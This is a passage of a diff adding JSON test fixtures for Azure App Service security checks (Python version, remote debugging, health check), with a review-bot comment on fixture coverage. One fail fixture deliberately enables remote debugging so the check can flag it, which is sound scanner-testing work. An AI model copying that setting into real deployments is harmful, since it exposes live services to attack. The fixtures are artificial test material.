"headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "3.10", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + 
"virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json b/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json new file mode 100644 index 00000000000..7e664c561be --- /dev/null +++ b/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json 
@@ -0,0 +1,381 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "metadata": {
+ "_generator": {
+ "name": "fail",
+ "version": "0.25.53.49325",
+ "templateHash": "16144177164140676603"
+ }
+ },
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]",
+ "minLength": 2,
+ "metadata": {
+ "description": "Web app name."
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ },
+ "sku": {
+ "type": "string",
+ "defaultValue": "F1",
+ "metadata": {
+ "description": "The SKU of App Service Plan."
+ }
+ },
+ "language": {
+ "type": "string",
+ "defaultValue": ".net",
+ "allowedValues": [
+ ".net",
+ "php",
+ "node",
+ "html"
+ ],
+ "metadata": {
+ "description": "The language stack of the app."
+ }
+ },
+ "helloWorld": {
+ "type": "bool",
+ "defaultValue": false,
+ "metadata": {
+ "description": "true = deploy a sample Hello World app."
+ }
+ },
+ "repoUrl": {
+ "type": "string",
+ "defaultValue": "",
+ "metadata": {
+ "description": "Optional Git Repo URL"
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]",
+ "gitRepoReference": {
+ ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started",
+ "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world",
+ "php": "https://github.com/Azure-Samples/php-docs-hello-world",
+ "html": "https://github.com/Azure-Samples/html-docs-hello-world"
+ },
+ "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]",
+ "configReference": {
+ ".net": {
+ "comments": ".Net app. No additional configuration needed."
+ },
+ "html": {
+ "comments": "HTML app. No additional configuration needed."
+ },
+ "php": {
+ "phpVersion": "7.4"
+ },
+ "node": {
+ "appSettings": [
+ {
+ "name": "WEBSITE_NODE_DEFAULT_VERSION",
+ "value": "12.15.0"
+ }
+ ]
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2022-09-01",
+ "name": "unknown",
+ "location": "string",
+ "tags": {
+ "tagName1": "tagValue1",
+ "tagName2": "tagValue2"
+ },
+ "kind": "string",
+ "extendedLocation": {
+ "name": "string"
+ },
+ "identity": {
+ "type": "string",
+ "userAssignedIdentities": {}
+ },
+ "properties": {
+ "clientAffinityEnabled": "bool",
+ "clientCertEnabled": "bool",
+ "clientCertExclusionPaths": "string",
+ "clientCertMode": "string",
+ "cloningInfo": {
+ "appSettingsOverrides": {},
+ "cloneCustomHostNames": "bool",
+ "cloneSourceControl": "bool",
+ "configureLoadBalancing": "bool",
+ "correlationId": "string",
+ "hostingEnvironment": "string",
+ "overwrite": "bool",
+ "sourceWebAppId": "string",
+ "sourceWebAppLocation": "string",
+ "trafficManagerProfileId": "string",
+ "trafficManagerProfileName": "string"
+ },
+ "containerSize": "int",
+ "customDomainVerificationId": "string",
+ "dailyMemoryTimeQuota": "int",
+ "enabled": "bool",
+ "hostingEnvironmentProfile": {
+ "id": "string"
+ },
+ "hostNamesDisabled": "bool",
+ "hostNameSslStates": [
+ {
+ "hostType": "string",
+ "name": "string",
+ "sslState": "string",
+ "thumbprint": "string",
+ "toUpdate": "bool",
+ "virtualIP": "string"
+ }
+ ],
+ "httpsOnly": "bool",
+ "hyperV": "bool",
+ "isXenon": "bool",
+ "keyVaultReferenceIdentity": "string",
+ "managedEnvironmentId": "string",
+ "publicNetworkAccess": "string",
+ "redundancyMode": "string",
+ "reserved": "bool",
+ "scmSiteAlsoStopped": "bool",
+ "serverFarmId": "string",
+ "siteConfig": {
+ "acrUseManagedIdentityCreds": "bool",
+ "acrUserManagedIdentityID": "string",
+ "alwaysOn": "bool",
+ "apiDefinition": {
+ "url": "string"
+ },
+ "apiManagementConfig": {
+ "id": "string"
+ },
+ "appCommandLine": "string",
+ "appSettings": [
+ {
+ "name":
"string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", 
+ "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "unknown", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", 
+ "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json new file mode 100644 index 00000000000..26100716400 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json 
@@ -0,0 +1,77 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "fail",
+ "location": "[parameters('location')]",
+ "kind": "app,linux",
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "reserved": true,
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2",
+ "remoteDebuggingEnabled": true
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
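Review bot: The three fixtures for this check (this fail.json, pass.json and pass1.json) only ever give `remoteDebuggingEnabled` as a JSON boolean or omit it, so how the check treats a string value or a template expression is untested. The same siteConfig already shows the string style with `"http20Enabled": "true"`, and real templates frequently carry `"remoteDebuggingEnabled": "true"` or `"[parameters('remoteDebugging')]"`; one extra fixture with `"remoteDebuggingEnabled": "true"` would pin whether that counts as enabled, and an expression fixture would pin the UNKNOWN path if the check has one. Which result is expected for those shapes depends on the check implementation, which is outside this hunk.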
diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json
new file mode 100644
index 00000000000..5e2c3318c72
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json
@@ -0,0 +1,77 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "pass",
+ "location": "[parameters('location')]",
+ "kind": "app,linux",
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "reserved": true,
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2",
+ "remoteDebuggingEnabled": false
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json
new file mode 100644
index 00000000000..f36cba465a0
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json
@@ -0,0 +1,76 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "pass1",
+ "location": "[parameters('location')]",
+ "kind": "app,linux",
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "reserved": true,
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+ "siteConfig": {
+ "linuxFxVersion": "[parameters('linuxFxVersion')]",
+ "http20Enabled": "true",
+ "minTlsVersion": "1.2"
+ },
+ "clientCertEnabled": true
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail.json b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail.json
new file mode 100644
index 00000000000..12a4acbb49a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail.json
@@ -0,0 +1,329 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue": "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku": {
+ "type": "string",
+ "defaultValue": "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion": {
+ "type": "string",
+ "defaultValue": "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2022-09-01",
+ "name": "fail",
+ "location": "string",
+ "tags": {
+ "tagName1": "tagValue1",
+ "tagName2": "tagValue2"
+ },
+ "kind": "string",
+ "extendedLocation": {
+ "name": "string"
+ },
+ "identity": {
+ "type": "string",
+ "userAssignedIdentities": {}
+ },
+ "properties": {
+ "clientAffinityEnabled": "bool",
+ "clientCertEnabled": "bool",
+ "clientCertExclusionPaths": "string",
+ "clientCertMode": "string",
+ "cloningInfo": {
+ "appSettingsOverrides": {},
+ "cloneCustomHostNames": "bool",
+ "cloneSourceControl": "bool",
+ "configureLoadBalancing": "bool",
+ "correlationId": "string",
+ "hostingEnvironment": "string",
+ "overwrite": "bool",
+ "sourceWebAppId": "string",
+ "sourceWebAppLocation": "string",
+ "trafficManagerProfileId": "string",
+ "trafficManagerProfileName": "string"
+ },
+ "containerSize": "int",
+ "customDomainVerificationId": "string",
+ "dailyMemoryTimeQuota": "int",
+ "enabled": "bool",
+
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": true, + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "is try string to app service disallow cors" + ], + 
"supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { 
+ "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": false, + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail2.json b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail2.json new file mode 100644 index 00000000000..f8f21267134 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceSetHealthCheck/fail2.json 
@@ -0,0 +1,329 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue": "AzureLinuxApp",
+ "metadata": {
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku": {
+ "type": "string",
+ "defaultValue": "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion": {
+ "type": "string",
+ "defaultValue": "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/slots",
+ "apiVersion": "2022-09-01",
+ "name": "fail2",
+ "location": "string",
+ "tags": {
+ "tagName1": "tagValue1",
+ "tagName2": "tagValue2"
+ },
+ "kind": "string",
+ "extendedLocation": {
+ "name": "string"
+ },
+ "identity": {
+ "type": "string",
+ "userAssignedIdentities": {}
+ },
+ "properties": {
+ "clientAffinityEnabled": "bool",
+ "clientCertEnabled": "bool",
+ "clientCertExclusionPaths": "string",
+ "clientCertMode": "string",
+ "cloningInfo": {
+ "appSettingsOverrides": {},
+ "cloneCustomHostNames": "bool",
+ "cloneSourceControl": "bool",
+ "configureLoadBalancing": "bool",
+ "correlationId": "string",
+ "hostingEnvironment": "string",
+ "overwrite": "bool",
+ "sourceWebAppId": "string",
+ "sourceWebAppLocation": "string",
+ "trafficManagerProfileId": "string",
+ "trafficManagerProfileName": "string"
+ },
+ "containerSize": "int",
+ "customDomainVerificationId": "string",
+ "dailyMemoryTimeQuota": "int",
+ "enabled": "bool",
+
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
